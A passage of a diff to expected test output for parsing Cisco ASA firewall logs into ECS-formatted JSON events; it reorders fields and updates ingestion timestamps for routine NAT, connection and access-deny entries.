"level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995975800Z", + "ingested": "2021-12-14T14:38:25.938997966Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30", "code": "305012", "kind": "event", @@ -16493,25 +16490,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16521,12 +16515,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995981100Z", + "ingested": "2021-12-14T14:38:25.938998715Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30", "code": "305012", "kind": "event", @@ -16540,25 +16537,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16568,12 +16562,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995987300Z", + "ingested": "2021-12-14T14:38:25.938999420Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30", "code": "305012", "kind": "event", @@ -16587,25 +16584,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16615,12 +16609,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995993700Z", + "ingested": "2021-12-14T14:38:25.939000214Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30", "code": "305012", "kind": "event", @@ -16634,25 +16631,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16662,12 +16656,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995999900Z", + "ingested": "2021-12-14T14:38:25.939000884Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30", "code": "305012", "kind": "event", @@ -16681,7 +16678,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -16742,7 +16742,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996006200Z", + "ingested": "2021-12-14T14:38:25.939001594Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308", "code": "305011", "kind": "event", @@ -16821,7 +16821,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996012300Z", + "ingested": "2021-12-14T14:38:25.939002437Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", "code": "302013", "kind": "event", @@ -16846,22 +16846,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16871,12 +16865,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996018600Z", + "ingested": "2021-12-14T14:38:25.939003422Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30", "code": "305012", "kind": "event", @@ -16890,25 +16887,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16918,12 +16912,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996024800Z", + "ingested": "2021-12-14T14:38:25.939004183Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30", "code": "305012", "kind": "event", @@ -16937,7 +16934,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -16999,7 +16999,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996031Z", + "ingested": "2021-12-14T14:38:25.939004877Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -17083,7 +17083,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996037300Z", + "ingested": "2021-12-14T14:38:25.939005641Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -17168,7 +17168,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.996043600Z", + "ingested": "2021-12-14T14:38:25.939006272Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", "code": "302016", "kind": "event", @@ -17252,7 +17252,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.996050200Z", + "ingested": "2021-12-14T14:38:25.939007122Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -17334,7 +17334,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996056400Z", + "ingested": "2021-12-14T14:38:25.939007634Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309", "code": "305011", "kind": "event", @@ -17413,7 +17413,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996062600Z", + "ingested": "2021-12-14T14:38:25.939008106Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", "code": "302013", "kind": "event", @@ -17438,22 +17438,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17463,12 +17457,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996068900Z", + "ingested": "2021-12-14T14:38:25.939008579Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30", "code": "305012", "kind": "event", @@ -17482,25 +17479,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17510,12 +17504,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996075100Z", + "ingested": "2021-12-14T14:38:25.939009059Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30", "code": "305012", "kind": "event", @@ -17529,25 +17526,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17557,12 +17551,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996079800Z", + "ingested": "2021-12-14T14:38:25.939009545Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30", "code": "305012", "kind": "event", @@ -17576,25 +17573,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17604,12 +17598,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996084800Z", + "ingested": "2021-12-14T14:38:25.939010126Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30", "code": "305012", "kind": "event", @@ -17623,25 +17620,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17651,12 +17645,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996090600Z", + "ingested": "2021-12-14T14:38:25.939010680Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30", "code": "305012", "kind": "event", @@ -17670,25 +17667,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17698,12 +17692,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996096Z", + "ingested": "2021-12-14T14:38:25.939011187Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30", "code": "305012", "kind": "event", @@ -17717,25 +17714,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17745,12 +17739,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996100400Z", + "ingested": "2021-12-14T14:38:25.939011649Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30", "code": "305012", "kind": "event", @@ -17764,7 +17761,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -17828,7 +17828,7 @@ "severity": 6, "duration": 4000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.996105400Z", + "ingested": "2021-12-14T14:38:25.939012117Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", "code": "302014", "kind": "event", @@ -17910,7 +17910,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996111700Z", + "ingested": "2021-12-14T14:38:25.939012581Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -17991,7 +17991,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996116300Z", + "ingested": "2021-12-14T14:38:25.939013108Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18072,7 +18072,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996120900Z", + "ingested": "2021-12-14T14:38:25.939013665Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18153,7 +18153,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996125100Z", + "ingested": "2021-12-14T14:38:25.939014136Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310", "code": "305011", "kind": "event", @@ -18232,7 +18232,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996129900Z", + "ingested": "2021-12-14T14:38:25.939014594Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", "code": "302013", "kind": "event", @@ -18315,7 +18315,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996136300Z", + "ingested": "2021-12-14T14:38:25.939015081Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18396,7 +18396,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996142600Z", + "ingested": "2021-12-14T14:38:25.939015543Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18477,7 +18477,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996148800Z", + "ingested": "2021-12-14T14:38:25.939016231Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18558,7 +18558,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996155300Z", + "ingested": "2021-12-14T14:38:25.939016697Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18639,7 +18639,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996161500Z", + "ingested": "2021-12-14T14:38:25.939017153Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18720,7 +18720,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996167700Z", + "ingested": "2021-12-14T14:38:25.939017622Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18801,7 +18801,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996175600Z", + "ingested": "2021-12-14T14:38:25.939018232Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18882,7 +18882,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996182Z", + "ingested": "2021-12-14T14:38:25.939018695Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18963,7 +18963,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996188300Z", + "ingested": "2021-12-14T14:38:25.939019458Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19044,7 +19044,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996194600Z", + "ingested": "2021-12-14T14:38:25.939019940Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19125,7 +19125,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996201300Z", + "ingested": "2021-12-14T14:38:25.939020752Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19206,7 +19206,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996207600Z", + "ingested": "2021-12-14T14:38:25.939021323Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19287,7 +19287,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996215200Z", + "ingested": "2021-12-14T14:38:25.939021901Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19368,7 +19368,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996221700Z", + "ingested": "2021-12-14T14:38:25.939022363Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19449,7 +19449,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996227100Z", + "ingested": "2021-12-14T14:38:25.939022916Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19530,7 +19530,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996232200Z", + "ingested": "2021-12-14T14:38:25.939023492Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19611,7 +19611,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996238400Z", + "ingested": "2021-12-14T14:38:25.939023954Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19692,7 +19692,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996244800Z", + "ingested": "2021-12-14T14:38:25.939024517Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19773,7 +19773,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996249400Z", + "ingested": "2021-12-14T14:38:25.939025114Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19854,7 +19854,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996254700Z", + "ingested": "2021-12-14T14:38:25.939025812Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19935,7 +19935,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996260900Z", + "ingested": "2021-12-14T14:38:25.939026351Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20016,7 +20016,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996266Z", + "ingested": "2021-12-14T14:38:25.939026903Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20097,7 +20097,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996271Z", + "ingested": "2021-12-14T14:38:25.939027391Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20178,7 +20178,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996277100Z", + "ingested": "2021-12-14T14:38:25.939027893Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20259,7 +20259,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996281800Z", + "ingested": "2021-12-14T14:38:25.939028373Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20340,7 +20340,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996286800Z", + "ingested": "2021-12-14T14:38:25.939028832Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20421,7 +20421,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996293300Z", + "ingested": "2021-12-14T14:38:25.939029294Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20502,7 +20502,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996299500Z", + "ingested": "2021-12-14T14:38:25.939029759Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20583,7 +20583,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996305800Z", + "ingested": "2021-12-14T14:38:25.939030246Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20664,7 +20664,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996312Z", + "ingested": "2021-12-14T14:38:25.939030846Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20745,7 +20745,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996318300Z", + "ingested": "2021-12-14T14:38:25.939031306Z", "original": "Oct 10 2018 12:34:56 localhost 